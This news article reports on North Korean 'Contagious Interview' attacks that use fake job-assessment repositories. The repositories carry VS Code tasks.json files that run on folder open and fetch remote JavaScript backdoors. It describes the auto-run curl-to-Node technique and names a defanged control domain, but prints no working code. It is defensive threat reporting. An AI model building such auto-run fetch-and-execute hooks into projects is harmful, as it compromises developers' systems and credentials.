In a concerning evolution of cyber warfare, North Korean state-sponsored threat actors, widely associated with the persistent “Contagious Interview” campaign, are now leveraging malicious Microsoft Visual Studio Code (VS Code) projects to infiltrate developer systems. This sophisticated new tactic, first identified in late 2025 by Jamf Threat Labs, marks a significant escalation in their efforts to compromise high-value targets within the tech and finance sectors.
The Deceptive Lure: A Job Assessment Gone Wrong
The core of this attack hinges on social engineering, preying on developers’ professional aspirations. Prospective victims are instructed to clone a seemingly legitimate code repository from platforms like GitHub, GitLab, or Bitbucket. The catch? This repository is part of a bogus “job assessment” designed to trick developers into launching the project within VS Code.
Security researcher Thijs Xhaflaire of Jamf Threat Labs explains, “This activity involved the deployment of a backdoor implant that provides remote code execution capabilities on the victim system.” Once the project is opened, the malicious VS Code task configuration files (tasks.json) spring into action. These files are configured with a “runOn: folderOpen” option, ensuring that embedded arbitrary commands are executed automatically upon opening the project or any file within it.
Multi-Stage Malware Deployment and Evasion
The immediate objective is to deploy sophisticated backdoors such as “BeaverTail” and “InvisibleFerret.” These payloads are often staged on Vercel domains, with the execution tailored to the victim’s operating system. A particularly insidious aspect of the campaign involves concealing multi-stage droppers within task configuration files, disguised as innocuous spell-check dictionaries. This serves as a robust fallback mechanism, ensuring malware delivery even if the primary Vercel domain payload fails.
The obfuscated JavaScript embedded within these files executes instantly when the project is opened. It establishes covert communication with a remote server (e.g., ip-regions-check.vercel[.]app) and awaits further instructions, executing any JavaScript code received.
An Undocumented Infection Method
Jamf’s latest findings reveal an even more advanced, previously undocumented infection method. While the initial vector—cloning and opening a malicious Git repository in VS Code—remains consistent, the subsequent steps have evolved. “When the project is opened, Visual Studio Code prompts the user to trust the repository author,” Xhaflaire notes. “If that trust is granted, the application automatically processes the repository’s tasks.json configuration file, which can result in embedded arbitrary commands being executed on the system.”
For macOS users, this is particularly dangerous. The tasks.json file triggers a background shell command using nohup bash -c and curl -s to retrieve a JavaScript payload remotely. This payload is then piped directly into the Node.js runtime, allowing execution to persist even if VS Code is terminated, all while suppressing command output to remain undetected.
The Backdoor’s Capabilities and AI Suspicions
The final JavaScript payload, also hosted on Vercel, forms the main backdoor. It establishes a persistent execution loop, gathering basic host information and maintaining continuous communication with the command-and-control server. This enables remote code execution, system fingerprinting, and further malicious activities.
In one observed instance, additional JavaScript instructions were executed approximately eight minutes post-infection, designed to beacon to the server every five seconds, run more code, and meticulously erase traces of its activity upon receiving a signal from the operator. Intriguingly, the presence of inline comments and specific phrasing in the source code has led researchers to suspect that some of these scripts might have been generated using artificial intelligence (AI) tools.
Why Developers? The DPRK’s Strategic Targets
North Korea-linked threat actors, often referred to as the Democratic People’s Republic of Korea (DPRK) state-sponsored groups, consistently target software engineers. Their focus is particularly sharp on those in the cryptocurrency, blockchain, and fintech sectors. The reason is clear: these professionals often possess privileged access to financial assets, digital wallets, sensitive source code, intellectual property, and critical internal systems.
Compromising such accounts and systems allows attackers to siphon digital assets, steal proprietary information, and gain unauthorized access to vital infrastructure. These continuous adaptations in tactics underscore the DPRK’s relentless pursuit of cyber espionage and financial gain, crucial for sustaining a heavily-sanctioned regime.
Broader Campaign Echoes and Developer Vigilance
This evolving threat is not isolated. Red Asgard recently detailed its investigation into a similar malicious repository using VS Code task configurations to deploy the “Tsunami” (aka TsunamiKit) backdoor alongside an XMRig cryptocurrency miner. Furthermore, Security Alliance reported on a campaign where an unspecified victim was approached on LinkedIn by threat actors impersonating a chief technology officer, again leveraging VS Code tasks for attack.
The message is clear: developers must exercise extreme caution when interacting with external repositories, especially those presented as part of unsolicited job opportunities or assessments. Verifying the authenticity of sources and understanding the implications of granting trust within IDEs like VS Code are paramount to safeguarding against these sophisticated and persistent threats.
For more details, visit our website.
Source: Link
Leave a comment